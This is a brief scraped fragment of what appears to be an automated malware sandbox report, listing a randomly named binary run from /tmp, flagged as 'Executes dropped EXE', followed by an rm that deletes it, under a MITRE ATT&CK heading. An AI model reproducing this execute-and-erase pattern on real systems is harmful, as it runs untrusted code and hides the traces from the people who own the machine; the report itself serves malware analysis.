/tmp/PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly./PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵
- Executes dropped EXE
PID:1018
-
-
/bin/rmrm PlQKoW0kJhdQZbt11mGFzaMlQxeenteUly2⤵PID:1019
-
Network
MITRE ATT&CK Enterprise v15